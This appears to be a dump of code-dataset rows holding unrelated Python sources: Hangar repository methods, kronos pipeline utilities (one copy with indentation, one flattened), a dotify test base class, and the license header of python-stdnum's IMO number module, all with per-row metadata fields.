    """Initialize a Hangar repository at the specified directory path.

    This function must be called before a checkout can be performed.

    Parameters
    ----------
    user_name : str
        Name of the repository user account.
    user_email : str
        Email address of the repository user account.
    remove_old : bool, kwarg-only
        DEVELOPER USE ONLY -- remove and reinitialize a Hangar repository at
        the given path, Default = False

    Returns
    -------
    str
        the full directory path where the Hangar repository was initialized
        on disk.
    """
    repo_dir = self._env.init_repo(user_name=user_name,
                                   user_email=user_email,
                                   remove_old=remove_old)
    return str(repo_dir)
def log(self,
        branch: str = None,
        commit: str = None,
        *,
        return_contents: bool = False,
        show_time: bool = False,
        show_user: bool = False) -> Optional[dict]:
    """Displays a pretty printed commit log graph to the terminal.

    .. note::

        For programatic access, set ``return_contents=True`` to retrieve the
        relevant commit specifications as dictionary elements.

    Parameters
    ----------
    branch : str, optional
        The name of the branch to start the log process from. (Default value
        = None)
    commit : str, optional
        The commit hash to start the log process from. (Default value = None)
    return_contents : bool, optional, kwarg only
        If true, return the commit graph specifications in a dictionary
        suitable for programatic access/evaluation.
    show_time : bool, optional, kwarg only
        If true and return_contents is False, show the time of each commit
        on the printed log graph
    show_user : bool, optional, kwarg only
        If true and return_contents is False, show the committer of each
        commit on the printed log graph

    Returns
    -------
    Optional[dict]
        Dict containing the commit ancestor graph, and all specifications.
    """
    self.__verify_repo_initialized()
    return summarize.log(branchenv=self._env.branchenv,
                         refenv=self._env.refenv,
                         branch=branch,
                         commit=commit,
                         return_contents=return_contents,
                         show_time=show_time,
                         show_user=show_user)
def summary(self, *, branch: str = '', commit: str = '') -> None:
    """Print a summary of the repository contents to the terminal

    Parameters
    ----------
    branch : str, optional
        A specific branch name whose head commit will be used as the summary
        point (Default value = '')
    commit : str, optional
        A specific commit hash which should be used as the summary point.
        (Default value = '')
    """
    self.__verify_repo_initialized()
    buf = summarize.summary(self._env, branch=branch, commit=commit)
    print(buf.getvalue())
    return None
def _details(self, *, line_limit=100, line_length=100) -> None:  # pragma: no cover
    """DEVELOPER USE ONLY: Dump some details about the underlying db structure to disk.
    """
    # Every environment goes through the same dump routine; iterate instead
    # of five copy-pasted print blocks (original dump order is preserved:
    # branch, ref, hash, stage, stagehash, then each commit env).
    envs = [self._env.branchenv, self._env.refenv, self._env.hashenv,
            self._env.stageenv, self._env.stagehashenv]
    envs.extend(self._env.cmtenv.values())
    for env in envs:
        print(summarize.details(
            env, line_limit=line_limit, line_length=line_length).getvalue())
    return
def _ecosystem_details(self) -> dict:
    """DEVELOPER USER ONLY: log and return package versions on the system.
    """
    return ecosystem.get_versions()
def _ref_to_commit_digest(self, ref: str, label: str, branch_names: List[str]) -> str:
    """Resolve *ref* (branch name or commit digest) into a commit digest.

    Parameters
    ----------
    ref : str
        branch name or commit hash digest to resolve.
    label : str
        argument name used in error messages ('master' or 'dev').
    branch_names : List[str]
        names of all branches currently recorded in the repository.

    Raises
    ------
    ValueError
        If *ref* is neither an existing branch name nor a commit hash
        recorded in the repository history.
    """
    if ref in branch_names:
        return heads.get_branch_head_commit(
            branchenv=self._env.branchenv, branch_name=ref)
    if not commiting.check_commit_hash_in_history(
            refenv=self._env.refenv, commit_hash=ref):
        raise ValueError(f'`{label}` {ref} is not valid branch/commit.')
    return ref

def diff(self, master: str, dev: str) -> DiffAndConflicts:
    """Calculate diff between master and dev branch/commits.

    Diff is calculated as if we are to merge "dev" into "master"

    Parameters
    ----------
    master: str
        branch name or commit hash digest to use as the "master" which
        changes made in "dev" are compared to.
    dev: str
        branch name or commit hash digest to use as the "dev"
        (ie. "feature") branch which changes have been made to
        which are to be compared to the contents of "master".

    Returns
    -------
    DiffAndConflicts
        Standard output diff structure.
    """
    branch_names = self.list_branches()
    # both arguments accept either form; the duplicated validate/translate
    # logic now lives in one helper working on digests internally.
    masterHEAD = self._ref_to_commit_digest(master, 'master', branch_names)
    devHEAD = self._ref_to_commit_digest(dev, 'dev', branch_names)
    differ = ReaderUserDiff(commit_hash=masterHEAD,
                            branchenv=self._env.branchenv,
                            refenv=self._env.refenv)
    return differ.commit(dev_commit_hash=devHEAD)
def merge(self, message: str, master_branch: str, dev_branch: str) -> str:
    """Perform a merge of the changes made on two branches.

    Parameters
    ----------
    message: str
        Commit message to use for this merge.
    master_branch : str
        name of the master branch to merge into
    dev_branch : str
        name of the dev/feature branch to merge

    Returns
    -------
    str
        Hash of the commit which is written if possible.
    """
    self.__verify_repo_initialized()
    # merge strategy selection is delegated entirely to select_merge_algorithm.
    return select_merge_algorithm(
        message=message,
        branchenv=self._env.branchenv,
        stageenv=self._env.stageenv,
        refenv=self._env.refenv,
        stagehashenv=self._env.stagehashenv,
        master_branch=master_branch,
        dev_branch=dev_branch,
        repo_path=self._repo_path)
def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:
    """create a branch with the provided name from a certain commit.

    If no base commit hash is specified, the current writer branch ``HEAD``
    commit is used as the ``base_commit``. Creating a branch does not create
    a checkout object; to interact with the data use the repository
    :meth:`checkout` method.

        >>> repo.create_branch('testbranch')
        BranchHead(name='testbranch', digest='b66b...a8cc')
        >>> repo.list_branches()
        ['master', 'testbranch']

    Parameters
    ----------
    name : str
        name to assign to the new branch
    base_commit : str, optional
        commit hash to start the branch root at. if not specified, the
        writer branch ``HEAD`` commit at the time of execution will be used,
        defaults to None

    Returns
    -------
    :class:`~.heads.BranchHead`
        NamedTuple[str, str] with fields for ``name`` and ``digest`` of the
        branch created (if the operation was successful)

    Raises
    ------
    ValueError
        If the branch name contains characters outside of alpha-numeric
        ascii plus ".", "_", "-" (no whitespace), is > 64 characters, or the
        branch already exists.
    RuntimeError
        If the repository does not have at-least one commit on the "default"
        (ie. ``master``) branch.
    """
    self.__verify_repo_initialized()
    if (not is_ascii(name)) or (not is_suitable_user_key(name)):
        raise ValueError(
            f'Branch name provided: {name} invalid. Must contain only alpha-numeric '
            f'or "." "_" "-" ascii characters. And be <= 64 Characters') from None
    return heads.create_branch(
        branchenv=self._env.branchenv,
        name=name,
        base_commit=base_commit)
def remove_branch(self, name: str, *, force_delete: bool = False) -> heads.BranchHead:
    """Permanently delete a branch pointer from the repository history.

    By default deletion is refused (an exception raised) unless the branch
    ``HEAD`` is referenced as an ancestor (or at least a twin) of another
    branch which is currently *ALIVE* -- in that case all changes are
    already merged and recorded, so the pointer can be removed without risk
    to historical provenance. Set ``force_delete=True`` to delete an
    un-merged branch anyway.

        >>> repo.remove_branch('second-testbranch')
        BranchHead(name='second-testbranch', digest='9785...56da')

    Note that only the name/digest pointer is removed: no commit refs (and
    none of the data they reference) are deleted from disk. Should an
    accidental forced deletion occur, recovery is possible by creating a new
    branch at the same digest via :meth:`create_branch`. A garbage collector
    for long-orphaned commits is planned but not implemented at the moment.

    Parameters
    ----------
    name : str
        name of the branch which should be deleted. This branch must exist,
        and cannot refer to a remote tracked branch (ie. origin/devbranch).
    force_delete : bool, optional
        If True, remove the branch pointer even if the changes are un-merged
        in other branch histories. May result in orphaned commits which may
        be time-consuming to recover if needed, by default False

    Returns
    -------
    :class:`~.heads.BranchHead`
        NamedTuple[str, str] with fields for `name` and `digest` of the
        branch pointer deleted.

    Raises
    ------
    ValueError
        If a branch with the provided name does not exist locally
    PermissionError
        If removal of the branch would result in a repository with zero
        local branches; if a write enabled checkout is holding the
        writer-lock at time of this call; or if the branch to be removed was
        the last used in a write-enabled checkout whose contents form the
        base of the staging area.
    RuntimeError
        If the branch has not been fully merged into other branch histories,
        and ``force_delete`` option is not ``True``.
    """
    self.__verify_repo_initialized()
    return heads.remove_branch(branchenv=self._env.branchenv,
                               refenv=self._env.refenv,
                               name=name,
                               force_delete=force_delete)
def list_branches(self) -> List[str]:
    """Return the name of every branch recorded in this repository.

    Returns
    -------
    List[str]
        the branch names recorded in the repository
    """
    self.__verify_repo_initialized()
    return heads.get_branch_names(self._env.branchenv)
def verify_repo_integrity(self) -> bool:
    """Run a full cryptographic verification of the repository data on disk.

    Every data piece is read back, hashed, and compared to its expected
    digest, and every commit ref is decompressed, re-serialized and
    re-hashed. Because each sample and each commit in the history must be
    processed (each exactly once), this may take a significant amount of
    time for repositories storing large quantities of data or containing
    very many commits.

    Returns
    -------
    bool
        True if integrity verification is successful, otherwise False; in
        this case, a message describing the offending component will be
        printed to stdout.
    """
    self.__verify_repo_initialized()
    branchenv = self._env.branchenv
    # take the writer lock for the duration of the verification run.
    heads.acquire_writer_lock(branchenv, 'VERIFY_PROCESS')
    try:
        integrity.run_verification(
            branchenv=branchenv,
            hashenv=self._env.hashenv,
            refenv=self._env.refenv,
            repo_path=self._env.repo_path)
    finally:
        heads.release_writer_lock(branchenv, 'VERIFY_PROCESS')
    return True
def force_release_writer_lock(self) -> bool:
    """Forcibly free the writer lock left behind by an unclosed write checkout.

    .. warning::

        *NEVER USE THIS METHOD IF A WRITER PROCESS IS CURRENTLY ACTIVE.*
        The implications of improper/malicious use are not understood, and
        there is a risk of undefined behavior or (potentially) data
        corruption.

    Closing a write-enabled checkout is currently the user's responsibility;
    if ``close()`` was never called before the program terminated, any new
    ``write=True`` checkout will fail until the lock is released through
    this method. This mechanism is subject to review/replacement in the
    future.

    Returns
    -------
    bool
        if the operation was successful.
    """
    self.__verify_repo_initialized()
    sentinel = parsing.repo_writer_lock_force_release_sentinal()
    return heads.release_writer_lock(self._env.branchenv, sentinel)
| pt | 0.178182 | 2.30898 | 2 |
kronos/utils.py | jtaghiyar/kronos | 17 | 13525 | '''
Created on Apr 16, 2014
@author: jtaghiyar
'''
import os
import subprocess as sub
from plumber import Plumber
from job_manager import LocalJobManager
from workflow_manager import WorkFlow
from helpers import trim, make_dir, export_to_environ
class ComponentAbstract(object):

    """
    Template every pipeline component must subclass.

    ``focus``, ``make_cmd`` and ``test`` are abstract hooks that raise
    ``NotImplementedError`` until overridden; ``run`` is a concrete driver
    built on top of ``make_cmd``.
    """

    def __init__(self, component_name, component_parent_dir=None, seed_dir_name=None):
        '''
        Initialize general attributes that each component must have.

        Parameters
        ----------
        component_name : str
            name of the component package/module to import.
        component_parent_dir : str, optional
            directory containing the component package; when given it is
            exported to the PYTHONPATH env var, otherwise the components
            directory must already be on PYTHONPATH.
        seed_dir_name : str, optional
            name of the seed directory inside the component package,
            defaults to 'component_seed'.
        '''
        ## export component parent directory to the PYTHONPATH env var
        if component_parent_dir is not None:
            export_to_environ(component_parent_dir, 'PYTHONPATH')

        ## import modules of the component, i.e. component_reqs and component_params.
        ## if component_parent_dir==None, then components directory must have been
        ## exported to the PYTHONPATH env var beforehand.
        list_of_modules = ['component_' + x for x in ['reqs', 'params']]
        # NOTE(review): level=-1 (implicit relative import) only exists on
        # Python 2; this call needs changing if the codebase moves to Python 3.
        m = __import__(component_name, globals(), locals(), list_of_modules, -1)
        if component_parent_dir is None:
            component_parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(m.__file__)))
        if seed_dir_name is None:
            seed_dir_name = 'component_seed'

        ## The component_ui is NOT imported, since all the input arguments should be
        ## passed to the component_main from config file via updating the self.args
        ## attribute, which happens in the corresponding task of the component.
        ## Therefore, an empty namespace is initialized here.
        import argparse
        parser = argparse.ArgumentParser()
        args, _ = parser.parse_known_args()

        ## general attributes
        self.component_name = component_name
        self.component_dir = component_parent_dir
        self.seed_dir = os.path.join(self.component_dir, component_name, seed_dir_name)

        ## modules and args
        self.args = args
        self._modules = m
        self.component_reqs = self._modules.component_reqs
        self.component_params = self._modules.component_params

        ## from the component_reqs
        self.env_vars = self.component_reqs.env_vars
        self.memory = self.component_reqs.memory
        self.parallel = self.component_reqs.parallel
        self.requirements = self.component_reqs.requirements.copy()
        self.seed_version = self.component_reqs.seed_version
        self.version = self.component_reqs.version

    def run(self):
        """Run the component via system command line locally."""
        cmd, cmd_args = self.make_cmd()
        ljm = LocalJobManager()
        ljm.run_job(cmd, cmd_args, self.component_name)

    def focus(self, cmd, cmd_args, chunk):
        """Update the cmd and cmd_args for each chunk; abstract hook.

        Subclasses must return the updated ``(cmd, cmd_args)`` pair. (The
        unreachable ``return`` that followed this raise was removed.)
        """
        raise NotImplementedError("focus method called before implementation")

    def make_cmd(self, chunk=None):
        """Make a command; abstract hook returning ``(cmd, cmd_args)``."""
        raise NotImplementedError("make_cmd method called before implementation")

    def test(self):
        """Run unittest of the component; abstract hook."""
        raise NotImplementedError("test method called before implementation")
class Task(object):
"""
Wrap one component for the following purposes:
1. to update the args passed to the component via command line.
2. to update the requirements of the component given in the config file.
3. to give access to the 'input_files', 'output_files',
'input_params', 'return_values' and 'input_arguments' of the component.
"""
def __init__(self, task_name, component):
self.task_name = task_name
self.component = component
def update_comp_args(self, **kwargs):
"""Update self.component.args, i.e. overwrite argument specified vi command line.
This can help pass the previous task's results to the parameters
of the current task.
"""
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
if kwargs is not None:
kwargs = trim(kwargs, '__pipeline__')
args_dict.update(kwargs)
def update_comp_reqs(self, reqs_dict):
"""Update self.component.requirements dictionary if there are new
values given in the config file, or keep the default otherwise.
"""
## do not update the default value of a requirement
## if it is not changed in the config file
## or it is not one of the requirements of the components
d = {k:v for k,v in reqs_dict.iteritems()
if v is not None and k in self.component.requirements.keys()}
self.component.requirements.update(d)
def update_comp_env_vars(self, env_vars):
"""update the environment variables with values from the config file."""
if not self.component.env_vars:
self.component.env_vars = env_vars
else:
self.component.env_vars.update(env_vars)
def update_comp_output_filenames(self, prefix, working_dir=None, no_prefix=False):
"""update the output file names by prepending the prefix to their names."""
output_file_params = self.component.component_params.output_files.keys()
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
wd = os.getcwd()
if working_dir:
os.chdir(working_dir)
for param in output_file_params:
value = args_dict.get(param)
if value is not None:
dirname = os.path.dirname(value)
self._make_dirs(dirname)
## prepend filenames with the given prefix
old_filename = os.path.basename(value)
if old_filename:
if no_prefix:
new_filename = old_filename
else:
new_filename = '_'.join([prefix, old_filename])
args_dict[param] = os.path.join(dirname, new_filename)
else:
args_dict[param] = dirname
os.chdir(wd)
def _make_dirs(self, path):
"""make dirs using os.makedirs"""
if not path:
return
try:
os.makedirs(path)
except OSError as e:
if e.strerror == 'File exists':
pass
else:
raise
class Pipeline(object):
'''
a pipeline could be composed of one or more ruffus task
that can be run as an independent entity provided that proper input/output
arguments are passed to it.
'''
def __init__(self, pipeline_name, config_file, script_dir=os.getcwd(), sample_id=None):
self.pipeline_name = pipeline_name
self.config_file = config_file
self.script_dir = script_dir
self.sample_id = sample_id
make_dir(self.script_dir)
## path to where the resultant pipeline script is written
self.pipeline_script = os.path.join(self.script_dir, self.pipeline_name+'.py')
## use the WorkFlow to parse/make the config file
self.wf = WorkFlow(config_file)
## holds the starting point of the sub pipeline, key:tag value:task_object
self.start_task = {}
## holds the end point of the sub pipeline, key:tag value:task_object
self.stop_task = {}
## list of all the inputs to the pipeline, i.e. set of the inputs of
## all the root tasks. A dict with k:input_params and v:input_arguments
self.inputs = {}
def make_script(self, sample_id):
"""run the plumber and make a python script for the pipeline."""
with open(self.pipeline_script, 'w') as ps:
plumber = Plumber(ps, self.wf)
plumber.make_script(sample_id)
def run(self):
try:
##TODO: this part is incomplete
## Technically, a pipeline is a script, and we run the
## script here using a LocalJobManager
cmd = 'python {}'.format(self.pipeline_script)
proc = sub.Popen(cmd, shell=True)
cmdout, cmderr = proc.communicate()
print cmdout, cmderr
# ljm = LocalJobManager(logs_dir, results_dir)
# ljm.run_job(cmd=cmd)
except KeyboardInterrupt:
print 'KeyboardInterruption in main'
self.kill()
raise
def kill(self):
"""kill all the jobs."""
pass
def add_component(self, component_name, component_parent_dir):
pass
def add_task(self, task_name, component):
"""add task object to the list of tasks."""
task = Task(task_name, component)
self.tasks[task_name] = task
def get_inputs(self):
"""get the list of all input file parameters of all the root
components in the pipeline.
"""
return self.tasks['root'].input_files
def update_pipeline_script_args(self, args_namespace):
"""update args namespace of the pipeline script."""
## change the Namespace object to dictionary
args_dict = vars(args_namespace)
##TODO: make proper dictionary from the values that
## needs to be passed to the pipeline script
kwargs = None
args_dict.update(kwargs)
def update_components_args(self):
"""update all the arguments of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_args()
method over each of the components in the pipeline.
"""
pass
def update_components_reqs(self):
"""update all the requirements of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_reqs()
method over each of the components in the pipeline.
"""
pass
def import_python_modules(self):
"""import required python modules for the pipeline to run."""
pass
def import_factory_modules(self):
"""import required factory modules for the pipeline to run."""
pass
def set_start_task(self, task_name):
self.start_task = self.tasks[task_name]
def set_stop_task(self, task_name):
self.stop_task = self.tasks[task_name]
| '''
Created on Apr 16, 2014
@author: jtaghiyar
'''
import os
import subprocess as sub
from plumber import Plumber
from job_manager import LocalJobManager
from workflow_manager import WorkFlow
from helpers import trim, make_dir, export_to_environ
class ComponentAbstract(object):
"""
component template.
"""
def __init__(self, component_name, component_parent_dir=None, seed_dir_name=None):
'''
initialize general attributes that each component must have.
'''
## export component parent directory to the PYTHONPATH env var
if component_parent_dir is not None:
export_to_environ(component_parent_dir, 'PYTHONPATH')
## import modules of the component, i.e. component_reqs and component_params.
## if component_parent_dir==None, then components directory must have been exported to
## the PYTHONPATH env var beforehand.
list_of_modules = ['component_' + x for x in['reqs', 'params']]
m = __import__(component_name, globals(), locals(), list_of_modules, -1)
if component_parent_dir is None:
component_parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(m.__file__)))
if seed_dir_name is None:
seed_dir_name = 'component_seed'
## The component_ui is NOT imported, since all the input arguments should be passed to
## the component_main from config file via updating self.args attribute that happens in
## the corresponding task of the component. Therefore, an empty namespace is initialized
## here.
import argparse
parser = argparse.ArgumentParser()
args, _ = parser.parse_known_args()
# args.__dict__['return_value'] = None
## general attribute
self.component_name = component_name
self.component_dir = component_parent_dir
self.seed_dir = os.path.join(self.component_dir, component_name, seed_dir_name)
## modules and args
self.args = args
self._modules = m
self.component_reqs = self._modules.component_reqs
self.component_params = self._modules.component_params
## from the component_reqs
self.env_vars = self.component_reqs.env_vars
self.memory = self.component_reqs.memory
self.parallel = self.component_reqs.parallel
self.requirements = self.component_reqs.requirements.copy()
self.seed_version = self.component_reqs.seed_version
self.version = self.component_reqs.version
def run(self):
"""run component via system command line locally."""
cmd, cmd_args = self.make_cmd()
ljm = LocalJobManager()
ljm.run_job(cmd, cmd_args, self.component_name)
def focus(self, cmd, cmd_args, chunk):
"update the cmd and cmd_args for each chunk."
raise NotImplementedError("focus method called before implementation")
return cmd, cmd_args
def make_cmd(self, chunk=None):
"""make a command."""
cmd = None
cmd_args = None
raise NotImplementedError("make_cmd method called before implementation")
return cmd, cmd_args
def test(self):
"""run unittest of the component."""
raise NotImplementedError("test method called before implementation")
class Task(object):
"""
Wrap one component for the following purposes:
1. to update the args passed to the component via command line.
2. to update the requirements of the component given in the config file.
3. to give access to the 'input_files', 'output_files',
'input_params', 'return_values' and 'input_arguments' of the component.
"""
def __init__(self, task_name, component):
self.task_name = task_name
self.component = component
def update_comp_args(self, **kwargs):
"""Update self.component.args, i.e. overwrite argument specified vi command line.
This can help pass the previous task's results to the parameters
of the current task.
"""
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
if kwargs is not None:
kwargs = trim(kwargs, '__pipeline__')
args_dict.update(kwargs)
def update_comp_reqs(self, reqs_dict):
"""Update self.component.requirements dictionary if there are new
values given in the config file, or keep the default otherwise.
"""
## do not update the default value of a requirement
## if it is not changed in the config file
## or it is not one of the requirements of the components
d = {k:v for k,v in reqs_dict.iteritems()
if v is not None and k in self.component.requirements.keys()}
self.component.requirements.update(d)
def update_comp_env_vars(self, env_vars):
"""update the environment variables with values from the config file."""
if not self.component.env_vars:
self.component.env_vars = env_vars
else:
self.component.env_vars.update(env_vars)
def update_comp_output_filenames(self, prefix, working_dir=None, no_prefix=False):
"""update the output file names by prepending the prefix to their names."""
output_file_params = self.component.component_params.output_files.keys()
## change the Namespace object to dictionary
args_dict = vars(self.component.args)
wd = os.getcwd()
if working_dir:
os.chdir(working_dir)
for param in output_file_params:
value = args_dict.get(param)
if value is not None:
dirname = os.path.dirname(value)
self._make_dirs(dirname)
## prepend filenames with the given prefix
old_filename = os.path.basename(value)
if old_filename:
if no_prefix:
new_filename = old_filename
else:
new_filename = '_'.join([prefix, old_filename])
args_dict[param] = os.path.join(dirname, new_filename)
else:
args_dict[param] = dirname
os.chdir(wd)
def _make_dirs(self, path):
"""make dirs using os.makedirs"""
if not path:
return
try:
os.makedirs(path)
except OSError as e:
if e.strerror == 'File exists':
pass
else:
raise
class Pipeline(object):
'''
a pipeline could be composed of one or more ruffus task
that can be run as an independent entity provided that proper input/output
arguments are passed to it.
'''
def __init__(self, pipeline_name, config_file, script_dir=os.getcwd(), sample_id=None):
self.pipeline_name = pipeline_name
self.config_file = config_file
self.script_dir = script_dir
self.sample_id = sample_id
make_dir(self.script_dir)
## path to where the resultant pipeline script is written
self.pipeline_script = os.path.join(self.script_dir, self.pipeline_name+'.py')
## use the WorkFlow to parse/make the config file
self.wf = WorkFlow(config_file)
## holds the starting point of the sub pipeline, key:tag value:task_object
self.start_task = {}
## holds the end point of the sub pipeline, key:tag value:task_object
self.stop_task = {}
## list of all the inputs to the pipeline, i.e. set of the inputs of
## all the root tasks. A dict with k:input_params and v:input_arguments
self.inputs = {}
def make_script(self, sample_id):
"""run the plumber and make a python script for the pipeline."""
with open(self.pipeline_script, 'w') as ps:
plumber = Plumber(ps, self.wf)
plumber.make_script(sample_id)
def run(self):
try:
##TODO: this part is incomplete
## Technically, a pipeline is a script, and we run the
## script here using a LocalJobManager
cmd = 'python {}'.format(self.pipeline_script)
proc = sub.Popen(cmd, shell=True)
cmdout, cmderr = proc.communicate()
print cmdout, cmderr
# ljm = LocalJobManager(logs_dir, results_dir)
# ljm.run_job(cmd=cmd)
except KeyboardInterrupt:
print 'KeyboardInterruption in main'
self.kill()
raise
def kill(self):
"""kill all the jobs."""
pass
def add_component(self, component_name, component_parent_dir):
pass
def add_task(self, task_name, component):
"""add task object to the list of tasks."""
task = Task(task_name, component)
self.tasks[task_name] = task
def get_inputs(self):
"""get the list of all input file parameters of all the root
components in the pipeline.
"""
return self.tasks['root'].input_files
def update_pipeline_script_args(self, args_namespace):
"""update args namespace of the pipeline script."""
## change the Namespace object to dictionary
args_dict = vars(args_namespace)
##TODO: make proper dictionary from the values that
## needs to be passed to the pipeline script
kwargs = None
args_dict.update(kwargs)
def update_components_args(self):
"""update all the arguments of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_args()
method over each of the components in the pipeline.
"""
pass
def update_components_reqs(self):
"""update all the requirements of all the components in the pipeline.
It is equivalent to running __TASK___task.update_comp_reqs()
method over each of the components in the pipeline.
"""
pass
def import_python_modules(self):
"""import required python modules for the pipeline to run."""
pass
def import_factory_modules(self):
"""import required factory modules for the pipeline to run."""
pass
def set_start_task(self, task_name):
self.start_task = self.tasks[task_name]
def set_stop_task(self, task_name):
self.stop_task = self.tasks[task_name]
| pt | 0.198522 | 2.274987 | 2 |
tests/base.py | the-dotify-project/dotify | 3 | 13526 | from pathlib import Path
from re import sub
from shutil import rmtree
from unittest import TestCase
from dotify import Dotify, models
class BaseNameResolverMixin(object):
@classmethod
def get_download_basename(cls, obj):
if isinstance(obj, models.Track):
return cls.get_download_basename_track(obj)
elif isinstance(obj, models.Playlist):
return cls.get_download_basename_playlist(obj)
elif isinstance(obj, models.Album):
return cls.get_download_basename_album(obj)
raise RuntimeError("`{0}` is an instance of {1}".format(obj, type(obj)))
@classmethod
def get_download_basename_track(cls, track):
artist, name = track.artist.name, track.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", "_", artist), sub(r"\s+", "_", name)
return "{0} - {1}.mp3".format(artist, name)
@classmethod
def get_download_basename_playlist(cls, playlist):
return sub(r"\s+", " ", playlist.name.strip())
@classmethod
def get_download_basename_album(cls, album):
artist, name = album.artist.name, album.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", " ", artist), sub(r"\s+", " ", name)
return "{0} - {1}".format(artist, name)
class DotifyBaseTestCase(TestCase, BaseNameResolverMixin):
def setUp(self):
self.client = Dotify()
self.test_directory = Path(__file__).parent / "tmp"
self.test_directory.mkdir(parents=True, exist_ok=True)
def tearDown(self):
rmtree(self.test_directory)
def download(self, cls_name, url):
with self.client:
model_type = getattr(models, cls_name)
obj = model_type.from_url(url)
download_basename = self.get_download_basename(obj)
download_fullpath = self.test_directory / download_basename
obj.download(download_fullpath)
self.assertTrue(download_fullpath.exists())
def search(self, cls_name, query, metadata_list, limit=1):
with self.client:
self.assertEqual(len(metadata_list), limit)
results = getattr(models, cls_name).search(query, limit=limit)
for result, metadata in zip(results, metadata_list):
for name, value in metadata.items():
self._test_search_result_metadata_equality(result, name, value)
@classmethod
def get_value(cls, obj, attribute_path):
return cls._get_value_recursive(
obj,
list(filter(None, attribute_path.split("."))),
)
@classmethod
def _get_value_recursive(cls, obj, paths):
if paths:
return cls._get_value_recursive(getattr(obj, paths[0]), paths[1:])
return obj
def _test_search_result_metadata_equality(self, result, name, value):
with self.subTest("Asserting metadata equality", **{name: value}):
self.assertEqual(self.get_value(result, name), value)
| from pathlib import Path
from re import sub
from shutil import rmtree
from unittest import TestCase
from dotify import Dotify, models
class BaseNameResolverMixin(object):
@classmethod
def get_download_basename(cls, obj):
if isinstance(obj, models.Track):
return cls.get_download_basename_track(obj)
elif isinstance(obj, models.Playlist):
return cls.get_download_basename_playlist(obj)
elif isinstance(obj, models.Album):
return cls.get_download_basename_album(obj)
raise RuntimeError("`{0}` is an instance of {1}".format(obj, type(obj)))
@classmethod
def get_download_basename_track(cls, track):
artist, name = track.artist.name, track.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", "_", artist), sub(r"\s+", "_", name)
return "{0} - {1}.mp3".format(artist, name)
@classmethod
def get_download_basename_playlist(cls, playlist):
return sub(r"\s+", " ", playlist.name.strip())
@classmethod
def get_download_basename_album(cls, album):
artist, name = album.artist.name, album.name
artist, name = artist.strip(), name.strip()
artist, name = sub(r"\s+", " ", artist), sub(r"\s+", " ", name)
return "{0} - {1}".format(artist, name)
class DotifyBaseTestCase(TestCase, BaseNameResolverMixin):
def setUp(self):
self.client = Dotify()
self.test_directory = Path(__file__).parent / "tmp"
self.test_directory.mkdir(parents=True, exist_ok=True)
def tearDown(self):
rmtree(self.test_directory)
def download(self, cls_name, url):
with self.client:
model_type = getattr(models, cls_name)
obj = model_type.from_url(url)
download_basename = self.get_download_basename(obj)
download_fullpath = self.test_directory / download_basename
obj.download(download_fullpath)
self.assertTrue(download_fullpath.exists())
def search(self, cls_name, query, metadata_list, limit=1):
with self.client:
self.assertEqual(len(metadata_list), limit)
results = getattr(models, cls_name).search(query, limit=limit)
for result, metadata in zip(results, metadata_list):
for name, value in metadata.items():
self._test_search_result_metadata_equality(result, name, value)
@classmethod
def get_value(cls, obj, attribute_path):
return cls._get_value_recursive(
obj,
list(filter(None, attribute_path.split("."))),
)
@classmethod
def _get_value_recursive(cls, obj, paths):
if paths:
return cls._get_value_recursive(getattr(obj, paths[0]), paths[1:])
return obj
def _test_search_result_metadata_equality(self, result, name, value):
with self.subTest("Asserting metadata equality", **{name: value}):
self.assertEqual(self.get_value(result, name), value)
| none | 1 | 2.531335 | 3 |
odoo-13.0/venv/lib/python3.8/site-packages/stdnum/imo.py | VaibhavBhujade/Blockchain-ERP-interoperability | 0 | 13527 | <reponame>VaibhavBhujade/Blockchain-ERP-interoperability
# imo.py - functions for handling IMO numbers
# coding: utf-8
#
# Copyright (C) 2015 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IMO number (International Maritime Organization number).
A number used to uniquely identify ships (the hull) for purposes of
registering owners and management companies. The ship identification number
consists of a six-digit sequentially assigned number and a check digit. The
number is usually prefixed with "IMO".
Note that there seem to be a large number of ships with an IMO that does not
have a valid check digit or even have a different length.
>>> validate('IMO 9319466')
'9319466'
>>> validate('IMO 8814275')
'8814275'
>>> validate('8814274')
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('8814275')
'IMO 8814275'
"""
from stdnum.exceptions import *
from stdnum.util import clean, isdigits
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
number = clean(number, ' ').upper().strip()
if number.startswith('IMO'):
number = number[3:]
return number
def calc_check_digit(number):
"""Calculate the check digits for the number."""
return str(sum(int(n) * (7 - i) for i, n in enumerate(number[:6])) % 10)
def validate(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
number = compact(number)
if not isdigits(number):
raise InvalidFormat()
if len(number) != 7:
raise InvalidLength()
if calc_check_digit(number[:-1]) != number[-1]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Check if the number provided is valid. This checks the length and
check digit."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number):
"""Reformat the number to the standard presentation format."""
return 'IMO ' + compact(number)
| # imo.py - functions for handling IMO numbers
# coding: utf-8
#
# Copyright (C) 2015 <NAME>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
